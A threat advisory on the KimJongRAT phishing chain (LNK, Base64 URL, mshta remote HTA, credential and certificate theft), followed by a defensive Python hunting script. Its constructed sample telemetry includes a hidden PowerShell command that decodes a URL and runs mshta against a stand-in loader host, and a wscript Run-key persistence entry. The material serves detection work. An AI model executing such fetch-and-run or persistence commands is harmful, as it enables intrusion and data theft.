Beware of KimJongRAT Being Distributed via .hta Files!
2025-11-28 • ESTSecurity • Beware of KimJongRAT Being Distributed via .hta Files
ESRC observed KimJongRAT, a remote access trojan that the source associates with the Kimsuky threat cluster, being distributed through phishing emails carrying a tax-notice-themed ZIP archive. The archive contains an LNK shortcut disguised as a PDF; when opened, it decodes a Base64-encoded URL, invokes mshta.exe against it, and retrieves a remote HTA loader. The HTA uses VBScript to download a decoy document and the malicious components, some of them hosted on Google Drive, and chooses different follow-on payloads depending on whether Windows Defender is enabled on the victim, so analysts should expect the observed payload to differ between a sandbox and a real endpoint.

The final payloads collect system information, browser-stored data together with the keys needed to decrypt it, cryptocurrency wallet data, Telegram and Discord data, and Korean NPKI/GPKI certificates, and they establish persistence through a Run registry key. The emphasis on Korean certificate material and locally stored credentials points to a Korea-focused intrusion set aimed at credential and information theft. Because the loader is fetched by mshta.exe from a remote URL after a shortcut-driven Base64 decode, the chain leaves a distinctive command-line and process-lineage footprint (a script host or mshta.exe launched with a URL or a Base64 blob on its command line) that is worth hunting for alongside the Run-key write.
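The hunting logic implied by that chain, as an added example that is not ESRC's code or a reproduction of the actual samples: it scans Sysmon-style process-creation and registry events for (1) Base64 tokens that decode to a URL, as produced by the LNK stage, (2) mshta.exe started with a remote URL, and (3) a Run-key value that points at a script host. The events, the `example.invalid` loader URL and the registry paths are constructed for the demonstration and are not indicators from the report.

```python
"""Hunting helpers for an LNK -> Base64 URL -> mshta -> remote HTA chain.
Added example, not ESRC code; every event below is constructed."""
import base64
import binascii
import re
from typing import Dict, List

URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)
B64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
SCRIPT_HOST_RE = re.compile(r"\.(hta|vbs|vbe|js|wsf)\b|mshta|wscript|cscript", re.IGNORECASE)

# Hypothetical loader URL (assumption for the demo, not an IOC from the report).
LOADER_URL = "https://example.invalid/loader.hta"
B64_URL = base64.b64encode(LOADER_URL.encode()).decode()
# Same URL as PowerShell -EncodedCommand would carry it (UTF-16LE before Base64).
B64_URL_UTF16 = base64.b64encode(LOADER_URL.encode("utf-16-le")).decode()


def decode_base64_urls(text: str) -> List[str]:
    """Return URLs hidden inside Base64 tokens in `text` (UTF-8 or UTF-16LE payloads)."""
    found: List[str] = []
    for token in B64_TOKEN_RE.findall(text):
        try:
            raw = base64.b64decode(token, validate=True)
        except (binascii.Error, ValueError):
            continue  # looked like Base64 but is not (e.g. a long hex or file name)
        for enc in ("utf-8", "utf-16-le"):
            try:
                decoded = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            found.extend(URL_RE.findall(decoded))
    return found


def analyze(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Apply the three rules and return one finding per matching event, in event order."""
    findings: List[Dict[str, str]] = []
    for ev in events:
        if ev["type"] == "process":
            image = ev["Image"].lower()
            cmd = ev["CommandLine"]
            urls = URL_RE.findall(cmd)          # URL in clear text on the command line
            hidden = decode_base64_urls(cmd)    # URL recovered from a Base64 blob
            if image.endswith("mshta.exe") and (urls or hidden):
                findings.append({"rule": "mshta_remote_hta",
                                 "evidence": (urls + hidden)[0], "parent": ev["ParentImage"]})
            elif hidden:
                findings.append({"rule": "base64_url_in_cmdline",
                                 "evidence": hidden[0], "parent": ev["ParentImage"]})
        elif ev["type"] == "registry":
            # Run-key write whose data launches a script host or script file.
            if RUN_KEY_RE.search(ev["TargetObject"]) and SCRIPT_HOST_RE.search(ev["Details"]):
                findings.append({"rule": "run_key_script_persistence",
                                 "evidence": ev["Details"], "parent": ev["Image"]})
    return findings


# Constructed sample telemetry (Sysmon-like field names).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    # 1. Shortcut-launched PowerShell decoding a Base64 URL and handing it to mshta.
    {"type": "process",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": ("powershell -w hidden -c \"$u=[Text.Encoding]::UTF8.GetString("
                     f"[Convert]::FromBase64String('{B64_URL}'));mshta $u\"")},
    # 2. mshta fetching the remote HTA loader.
    {"type": "process", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"mshta.exe {LOADER_URL}"},
    # 3. Benign mshta run against a local file: must not alert.
    {"type": "process", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
    # 4. Run-key persistence pointing at a script host.
    {"type": "registry", "Image": r"C:\Windows\System32\wscript.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"wscript.exe //B C:\Users\user\AppData\Roaming\update.vbs"},
    # 5. Benign Run-key write by a vendor installer: must not alert.
    {"type": "registry", "Image": r"C:\Program Files\Vendor\setup.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\VendorTray",
     "Details": r"C:\Program Files\Vendor\tray.exe"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f['rule']:28} parent={f['parent']}  evidence={f['evidence']}")
```

Run stand-alone, the block reports events 1, 2 and 4 and stays silent on the benign mshta and Run-key writes. The Base64 rule deliberately reports only tokens that decode to a URL, since long Base64 strings are common in legitimate command lines; the UTF-16LE pass covers `powershell -EncodedCommand` style blobs, which the UTF-8 pass would miss.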